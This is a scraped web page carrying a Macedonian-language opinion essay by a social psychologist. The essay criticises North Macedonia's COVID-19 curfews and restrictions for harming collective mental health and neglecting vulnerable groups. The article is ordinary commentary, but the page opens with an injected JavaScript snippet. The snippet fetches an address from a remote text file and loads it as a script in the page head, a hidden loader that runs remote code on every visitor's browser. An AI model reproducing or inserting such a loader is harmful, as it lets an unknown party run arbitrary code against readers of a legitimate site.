;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Со „очи широко затворени‘’ - процесот на пандемијата, мерките и потоа - Антропол
АктуелноЛокалноСтав

Со „очи широко затворени‘’ – процесот на пандемијата, мерките и потоа

Имајќи ја во предвид социо-економската состојба на граѓаните, како и стигматизацијата кон психолошката и психијатриската помош, можеме уште сега да ја увидиме бавноста при репарирањето и на така оштетената колективна ментална состојба на нашиот народ.


Ивана Стоименовска
(социјален психолог)

Новиот корона вирус, или Ковид- 19 кој се појави на крајот на 2019 година, го алармира и потресе светот само за неколку недели. Процесот на ширење  на вирусот се одвиваше многу брзо, за кратко време го зафати целиот свет, и се чинеше никој не беше доволно свесен и на никој не му беше доволно јасно, каков стил на живеење ќе искусиме, како ќе се прилагодиме на истиот, како ќе го изменаџираме или како ќе се справиме со стресот и со какви последици ќе се соочиме после завршувањето на пандемијата. И додека се превенира ширењето на вирусот, првично само од медицински аспект, се чини дека психолошките/психијатриските последици ќе бидат повеќе и подолготрајни. Нашата влада донесе многу рестриктивни мерки кои сигурно ќе придонесат за поголеми нарушувања врз менталното здравје на луѓето.

За кратко време на најголем удар (и тест) беа изложени владите и јавниот здравствен систем, како во светот, така и кај нас. Така, во нашата држава, донесените мерки влијаеа врз ширењето на пандемијата примарно, бидејќи истите не беа осмислени правилно. Причина за ова е стравот на властите дека доколку дојде до оптоварување на и така слабиот здравствен систем (кој што двете политички партии свесно го занемаруваа), ќе немаме капацитет да се справиме со проблемот. На овој начин, веќе имаме контра-ефект кој се појавува  и како примарен, но и како секундарен. Односно, ширењето на вирусот со овие мерки не се превенираше бидејќи најголемите гужви се правеа во еден-два часа кои им беа дозволени на граѓаните за да ги набават своите основни намирници, и траумата на ментално ниво која што ќе има импакт врз нормалното функционирање на граѓаните уште долго по завршувањето на пандемијата. Кога организмот се соочува со траума тоа може да биде многу токсично врз менталното здравје и, без соодветна подршка, опоравувањето од таа траума може да трае многу подолго. Имајќи ја во предвид социо-економската состојба на граѓаните, како и стигматизацијата кон психолошката и психијатриската помош, можеме уште сега да ја увидиме бавноста при репарирањето и на така оштетената колективна ментална состојба на нашиот народ. 

Единствено ние и Србија искусуваме живеење во полициски час и неколкудневна карантинска изолација, без можност од било какви активности надвор. Како и нешто што е врв на нелогичноста, а тоа беше забраната за шетање во шуми и природа. Сите стручни лица од областа на здравството, како и психијатри и психолози, укажуваат дека излегувањето на воздух и во природа е од исклучителна важност за зачувување на имунолошкиот систем, како и пожелно за справување со стресот, анксиозноста, депресијата, како и за зачувување на менталното здравје воопшто. Последиците на ментално ниво со подолготрајни последици директно ќе произлезат од финансиските загуби со кои се соочија луѓето. Во Македонија, илјадници луѓе од средната и ниската класа финансиски беа засегнати од мерките кои ги презеде Владата во борбата против корона-вирусот, оправдувани преку убавата фасада на флоскулата ‘’за доброто на сите’’.

Понатаму, поради социјалната дистанца и изолација, различни групи кои спаѓаат во ризични категории на лица ќе бидат занемерени додека се стремиме да се постигне примарната цел. Некои психолози и психијатри се активно вклучени во советодавни и консултантски услуги кои се одвиваат online, но треба да се има во предвид дека менталните проблеми со кои се соочуваат луѓето се од различна категорија на луѓе, при што на многу од нив им се непознати интернет – услугите или пак не се свесни дека истите постојат. Тука припаѓаат луѓето кои се повозрасни и на кои технологијата им е непозната, луѓе со деменција, луѓе кои се засегнати од аутистичниот спектар на нарушувања , луѓе со душевни заболувања кои се оневозможени самостојно да се справат со секојдневното функционирање и со обавување на основните потреби, луѓе од социјално загрозени семејства кои немаат допир до интернет услуги или можеби и немаат на телевизори во своите домови да бидат барем некако информирани. 

На глобално ниво видовме како многу од државите, кои беа и најпогодени од пандемијата, доживуваат некој вид трансформација на колективната свест. Ќе ја земам Италија за пример, која како членка на Европската Унија, последователно ја очекуваше и помошта од истата, но помошта стигна од страни на светот кај кои внатрешните политики се базирани на солидарни концепти и кои први ја понудија својата рака, без да бараат ништо за возврат. Светот минува и допрва ќе минува низ трансформација која ќе биде економска, политичка и психолошка. Генерално ќе научиме како да ги цениме вистинските човечки вредности кои имаат солидарен карактер и кои се значајни за опстојување на целиот колектив. ,

Освен тоа што се надевам дека ние како колективна свест ќе научиме да бидеме сочуствителни и поемпатични за луѓето околу нас, особено за оние најслабите и најзагрозените, ќе увидиме и дека околностите кои ги посакуваме во нашето опкружување зависат од нас самите, а не од „розевите“ ветувања на меѓународните и транснационалните ентитети. И на овој начин ке се фокусираме на реалните политики за подобрување на нашата околина, а не слепо да ги следиме „препораките“ наметнати од институции врз чие градење немаме речиси никаков удел и влијание. 

Се надевам дека оваа состојба ќе влијае отрезнувачки кај нашиот народ и навистина нашата колективна свест ќе доживее таква трансформација што нема да дозволиме повторно да живееме со ‘’очи широко затворени‘‘.